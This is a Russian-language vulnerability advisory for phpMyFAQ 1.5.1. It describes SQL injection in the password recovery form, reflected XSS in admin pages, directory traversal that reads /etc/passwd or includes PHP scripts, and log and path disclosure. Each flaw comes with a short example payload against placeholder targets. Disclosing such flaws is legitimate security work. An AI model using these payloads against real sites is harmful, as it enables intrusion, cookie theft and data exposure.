Программа: phpMyFAQ 1.5.1 

Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, выполнить произвольные SQL команды и PHP сценарии на целевой системе.

1. SQL-инъекция обнаружена в сценарии '/admin/password.php' из-за недостаточной обработки входных данных. При выключенной опции PHP magic quotes удаленный пользователь может выполнить произвольные SQL команды на системе. Пример формы восстановления пароля:

user: ' or isnull(1/0) /*
mail: [your_email]

2. Удаленный пользователь может произвести XSS нападение и получить доступ к потенциально важным данным других пользователей. 

Пример:

http://[target]/[path]/phpmyfaq/admin/footer.php? PMF_CONF[version]=<script>alert(document.cookie)
</script>

http://[target]/[path]/phpmyfaq/admin/header.php? PMF_LANG[metaLanguage]="><script>alert(document.cookie)
</script>

3. Удаленный пользователь может выполнить произвольный PHP сценарий на системе с помощью символов обхода каталога. 

Пример:

http://[target]/[path]/phpmyfaq/index.php? LANGCODE=/../../../../[scriptname]

http://[target]/[path]/phpmyfaq/index.php? LANGCODE=/../../ ../../../../etc/passwd%00 

4. Удаленный пользователь может получить доступ к лог файлу. Пример:

http://[target]/[path]/phpmyfaq/data/tracking[date]

5. Удаленный пользователь может получить данные об установочной директории приложения на сервере. Пример:

http://[target]/[path]/phpmyfaq/index.php?LANGCODE=[a_non_existent_file]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии